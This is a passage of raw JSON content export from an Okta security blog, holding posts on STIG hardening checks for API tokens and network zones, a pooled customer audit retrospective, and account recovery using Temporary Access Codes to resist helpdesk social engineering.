These are the kinds of checks that Okta leveraged to help prevent attacks, such as the recent \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/newsroom/articles/the-salesloft-incident--a-wake-up-call-for-saas-security-and-ips/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Salesloft Drift\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/newsroom/articles/first-drift--now-gainsight--closing-the-gaps-in-saas-hygiene/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Gainsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" attacks. These checks are specific to Okta’s offerings, but the same approach should be used for other service offerings. We hope these checks will serve you as well as they have served Okta. At the end of the day, this is a ‘least privilege’ issue. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Five Additional Checks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta API tokens must be configured with Network Zones to restrict authorization from known networks. API tokens are almost always privileged and sensitive. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This check helps to verify that for all Okta-specific API tokens, an IP restriction is in place to help confirm that if a token is compromised, it cannot be used from an unapproved IP. Typically, a customer would configure this to be either VPN/SASE IP ranges, datacenter (cloud) ranges, or known office ranges. These should be configured to known and “owned” contiguous IP space. 
In the case of cloud, it should be a known contiguous IP range that is allocated only to your organization. Allowlisting the entire IP range of a public cloud service provider like AWS, Google or Azure would not be appropriate. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta API tokens must be created under dedicated user accounts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is an Okta-specific check to help confirm that API tokens (NHI) are under a dedicated account that is not tied to an administrator. This aims to reduce privileges for NHIs and check if they are appropriate for their use cases. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Global Session policy must be configured to allow or deny IP based access in accordance with the Access Control policy for Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This check helps confirm that a Global Policy is defined for your users. In many companies, workforce users should only request resources from approved VPNs or SASE services (i.e. not from the general internet).  In the DoD use cases, this may be restricted to NIPRNet or other approved networks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta must be configured with Network Zones defined to block anonymized proxies according to organizational defined policy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Anonymized proxies are often a source of malicious traffic. Blocking this from the outset can help reduce probes as well as attack vectors. 
As a commercial customer, you may want to allow anonymized proxies for maximum reach and compatibility, but consider blocking them for privileged use cases. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For each application integrated with Okta, network zones must be defined in its authentication policy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This check helps to confirm that every application configured in an Okta organization takes IP restrictions into consideration. Does it really need to be accessible to any malicious actor on the internet? Customers should take a risk-based approach and work to verify that network restrictions are appropriate for the accessibility and use cases. The default is to allow internet access to the application; so, care should be taken to evaluate whether that is appropriate for the application.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Call to Action\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend customers assess their Okta organizations against the updated STIG. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta IDaaS STIG is available to download at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://public.cyber.mil/stigs/downloads/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://public.cyber.mil/stigs/downloads/\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", search for Okta. 
If you have feedback on the STIG, please contact \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:fedramp@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"fedramp@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Version 1.1 of the Okta Security Technical Implementation Guide (STIG) provides U.S. government agencies additional hardening recommendations related to network security and non-human identities.\n"},"updatedAt":"2026-02-03T14:00:10.572Z","secAuthor":[{"id":"96970804-8b58-5b39-9146-0928bc8a399b","bio":{"bio":"<p>Rob Gil is a Sr. Director, Federal Architecture at Okta and is responsible for leading the Public Sector technology initiatives for FedRAMP, DoD Impact Levels, and StateRAMP. Prior to Okta, Rob worked on the JEDI project for the DoD Cloud Computing Program Office as well as leading the Cloud SecOps team at Elastic. Rob’s work at Elastic helped set the foundations for the Elastic SIEM as an initial core contributor to the Elastic Common Schema and first version of the Elastic SIEM. Before Elastic, Rob led operations and engineering teams at Salesforce and a variety of financial institutions. When not working, Rob enjoys the quiet life on his homestead and dabbling with tech. </p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg"},"name":"Rob Gil","jobTitle":"Sr. Director, Federal Architecture","slug":"/hackers/rob-gil","node_locale":"en"},{"id":"110196ee-f45a-5ada-b02c-40d591fa732c","bio":{"bio":"<p> Naveed is a Senior Solutions Architect at Okta, focusing on the DoD and Federal customer base. He has worked in cybersecurity since leaving the US Navy in the late 1990s. 
Before coming to Okta, Naveed was a consultant for several DoD customers, and he continues to offer advice via active participation in the DoD community. He grew up in Stafford, Virginia, and upon returning from active duty, took up residence there once more. In his free time, he enjoys beer brewing, gaming, and the occasional date night with his wife.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg"},"name":"Naveed Mirza","jobTitle":"Senior Solutions Architect","slug":"/hackers/naveed-mirza","node_locale":"en"},{"id":"76ecc069-7d69-5aa8-a81d-cf72595f683e","bio":{"bio":"<p> Brandon Iske is a Principal Solutions Architect focused on enabling Federal Government and strategic accounts at Okta. He is passionate about strengthening our nation’s cybersecurity and user experience through Identity-focused IT modernization and cyber best practices. Before joining Okta, Brandon worked for over a decade in government public service to deliver and secure joint Department of Defense enterprise capabilities in endpoint security, mobile management, identity and access management, and Zero Trust architecture at the Defense Information Systems Agency. He earned a Bachelor’s Degree in Computer Science from the University of Nebraska at Omaha. 
He is also a National Science Foundation CyberCorps Scholarship for Service Alumnus and an Okta Certified Professional.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg"},"name":"Brandon Iske","jobTitle":"Principal Solutions Architect","slug":"/hackers/brandon-iske","node_locale":"en"}]},{"slug":"/pooledauditretro","id":"e6f9f5c5-3779-5bfe-9ef2-a4626c14b4f4","title":"Okta Pooled Security Audits: a One-Year Retrospective ","date":"2026-01-12T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Customer audit is evolving beyond the traditional one-to-one audit model. When Okta's Customer Audit team first published \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/06/paving-the-path-pooled-audits-with-okta-security/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Paving the Path: Pooled Audits with Okta Security\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" last year, we shared our vision for moving beyond the limitations of siloed assessments. Today, as successive SaaS supply chain attacks continue to ring alarm bells across the industry, that strategic vision is now a reality.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This year-in-review retrospective demonstrates how our pooled audit methodology has become a powerful mechanism for collaborative peer discussion - raising the bar for supply chain security for both Okta and our customers. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"The Rationale: Designed to be Different \",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Traditional audit models create a heavy, linear burden: each customer audit request requires Okta's security team to provide a tailored evidence package in response. Our pooled audit program was designed to break the status quo. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We measure success based on the program's ability to minimize redundant effort for our internal teams, while offering customers something a traditional audit cannot: context and community. By shifting to this model, we deliver assurance faster, but also provide a forum for peer-to-peer exchange that turns a compliance checkbox into a strategic value-add. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Quantifying Success: The Metrics Validating the 1:Many Shift\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our results validate the success of the pooled audit program. We track several KPIs that demonstrate a consistent, positive shift in our compliance efficiency and translate to business impact for customers.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Most notably, participant feedback highlights the quality and effectiveness of the new model. 
In our post-audit survey, customers indicated:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"94% reported feeling supported in achieving their organizational compliance and assurance goals, and\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"98% reported a high level of confidence in Okta as a security partner.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our KPIs demonstrate program efficiency across the following strategic priorities:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Key Performance Indicator (KPI)\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Trend (1-Year Retrospective)\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Business Impact\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"}],\"nodeType\":\"table-row\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Individual Audit Request Burden\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"As more customers participate in the 
pooled audit program, Okta's security team has been able to assist additional customers with unique requirements. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Demonstrates the successful transition from a 1:1 service model to a scalable, sustainable 1:Many approach, freeing up the team to support new audits.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"}],\"nodeType\":\"table-row\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Pooled Audit Participation Rate\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Increase in the number of customers participating in a single pooled session.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Proves the scalability and value of the program, resulting in a higher number of customers supported.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"}],\"nodeType\":\"table-row\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Customer Audit Days Saved\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Significant reduction in total FTE-days required from Okta Security supporting 1:1 audits. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Cost avoidance, allowing the team to focus on other value-add work. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"}],\"nodeType\":\"table-row\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Time-to-Assurance (TTA)\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Consistent decrease in the average time required for a participating customer to receive full audit assurance.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Accelerated compliance: Enables customers to meet their regulatory deadlines faster.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"table-cell\"}],\"nodeType\":\"table-row\"}],\"nodeType\":\"table\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Supply Chain Assurance\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Beyond compliance, the validation of the pooled audit program is its role in educating customers about current threats, and Okta’s best practice guidance to defend identities. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Audit sessions deep-dive into the controls that close the gaps exploited in the recent compromises of \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/newsroom/articles/the-salesloft-incident--a-wake-up-call-for-saas-security-and-ips/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Salesloft\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/de-de/newsroom/articles/first-drift--now-gainsight--closing-the-gaps-in-saas-hygiene/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Gainsight\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", specifically validating our adherence to the five pillars of SaaS hygiene: \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Strong authentication,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Strong identity governance,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Interactive session security,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Non-interactive session security, 
and\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Strong auditability.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"ordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"By aligning these technical verifications against global regulatory expectations (e.g. for financial services: DORA, APRA or NYDFS), the program does more than prove compliance; it provides customers with high-assurance evidence that their critical identity vendor is built to withstand and recover from major supply chain disruptions.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Deep-Dive Assurance at Scale\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The strategic value of the pooled audit program extends beyond efficiency; it redefines the depth of assurance. We move beyond static document exchanges, and instead host multiple industry-specific customers for multi-day, hands-on sessions to collectively assess our controls against their regulatory expectations. We encourage peer challenge, and this peer review makes us stronger. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our recent engagements with financial services customers prove out this model. These were detailed, collective assessments across nine critical domains key to operational resilience and security.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The result is genuine assurance in a peer setting, offering value exceeding a compliance checkmark. 
By delivering granular, domain-specific coverage for specific regulations, we reduce reliance on bespoke, time-consuming customer audits in favor of a better outcome. Okta’s pooled audit methodology is increasing the depth of scrutiny our controls receive. Good for customers, and good for Okta. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Conclusion: A Call for a New Industry Norm\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We have transitioned from \\\"paving\\\" to \\\"practice\\\". The pooled audit program is no longer just an efficiency initiative; it is the assurance mechanism that informs our customers’ supply chain security posture and offers Okta valuable customer insight in a peer-to-peer forum. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"However, this success shouldn't be unique to Okta. This is our call to action for the wider SaaS industry in making the Pooled Audit model the norm, and not the exception. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We invite Okta customers to be part of this evolution: reach out to your account team today to join our next pooled audit cohort for your industry.\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"By adopting this shared assurance approach, we can collectively reduce the compliance burden on customers, eliminate redundancy, and focus our resources on what truly matters — securing the ecosystem against evolving threats.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"Okta and its customers are benefitting from \"pooled\" security audits."},"updatedAt":"2026-01-12T23:56:33.135Z","secAuthor":[{"id":"0549c9bd-5615-52a0-8683-f6b734b931cc","bio":{"bio":"<p> Tushar Badlani is the Global Customer Audit Manager within the Security Trust and Culture team at Okta. He leads Okta’s global customer audit program, ensuring consistent, risk-aligned assurance engagements across all regions. He brings extensive experience in customer assurance, compliance, and cross-functional collaboration, shaped by his consulting background at EY and work across industries and in professional services. Originally from India, he earned his master’s degree from Syracuse University and is now based in San Francisco. 
Outside of work, he enjoys hiking, backpacking, and travelling to explore new places and cultures; he’s now been to 27 countries and 45 US States.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/61duT68OiTwHjxJS8gPPuy/f02be27b559de0ada96a7902d219f067/Tushar_HeadShot.jpg"},"name":"Tushar Badlani","jobTitle":"Global Customer Audit Manager","slug":"/hacker/tushar-badlani","node_locale":"en"}]},{"slug":"/articles/2025/12/account-recovery-without-password-resets","id":"8135b418-47e7-59dd-a4ba-3b80ac22b5bc","title":"Account Recovery, without Password Resets","date":"2025-12-10T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the joys of passwordless authentication is the huge reduction in help desk tickets arising from users who have forgotten or otherwise can’t access their passwords.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizations that have embraced \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/fp/fp-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report lower costs of support after the initial hurdle of getting their users enrolled. 
They also report greater confidence in their security posture, knowing that access to sensitive resources requires a tight coupling of a user and their device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Those organizations that continue to rely on passwords as a primary authenticator still have good options for securing sign-on events: they can lock down sign-ins using device trust and multifactor authentication, among other options. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In any case, strong \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/policies/about-policies.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"sign-in policies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" shift the threat actor’s available options to the next weakest point in the user lifecycle: enrollment and account recovery. Threat actors continue to enjoy success when impersonating users in calls to IT helpdesks, requesting the service desk staff perform a password reset (typically followed by follow-up calls to reset other MFA factors).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These attacks are often successful in organizations with outsourced service desks. Outsourced IT service desk professionals are highly incentivized around how responsive they are to client needs. In doing so they are highly vulnerable to a skilled social engineer who impersonates a senior figure in a client organization. 
While it’s the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://arstechnica.com/security/2025/07/how-do-hackers-get-passwords-sometimes-they-just-ask/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"subject of some debate\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", it’s the client organization’s duty to set up outsourced service desk professionals with the guardrails they need to withstand social engineering attacks. Those guardrails need to include strong identity verification processes, which present challenges in a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/newsroom/articles/verifying-identity-remote-workforce/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"remote and extended workforce\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".  \\n\\nTo help solve this problem, Okta has partnered with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"multiple identity verification providers\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/06/building-confidence-in-support-comms-with-caller-verify-at-okta/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"specialists in recovery workflows\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to prove the identity of an inbound caller. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once a user’s identity is verified, the next question is how to provide support desk personnel with a safe way to recover access for the user. 
That’s where \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/configure-temporary-access-code.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Temporary Access Codes (TACs)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" come in very handy. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Constraining account recovery\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Even if you have sufficiently verified the identity of an inbound caller, there are residual risks associated with service desk professionals being asked to create and share temporary passwords. A temporary password can be shared or intercepted and abused prior to use and rotation by the legitimate account holder.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ideally, any use of temporary credentials is constrained to an expected context. A TAC, unlike a temporary password, is a time-bound secret that is classed in Okta as an authenticator, which means it can be subject to authentication policies. Administrators can decide, for example, which users are able to be issued a TAC, how long the TAC is valid for use, and from what location and device a TAC can be used. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"TACs bring an important account recovery option to passwordless environments, where a misplaced security key or other possession factor may temporarily prevent a user from accessing their resources. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But the utility of a TAC doesn’t end there. 
Any Okta workforce customer now has the option  to disable the issuing of temporary passwords or resetting of passwords and MFA factors from front-line helpdesk roles. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I’ve previously \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/09/go-secure-default-custom-admin-roles-it-support-staff/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"recommended the use of custom admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to create helpdesk roles that constrain the ability of service desk professionals to reset the factors of privileged users like administrators. Now there’s an opportunity to go one step further and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/create-custom-admin-roles-for-user-account-recovery-processes\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"create custom admin roles that can’t reset passwords or factors\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The custom helpdesk role would need, at 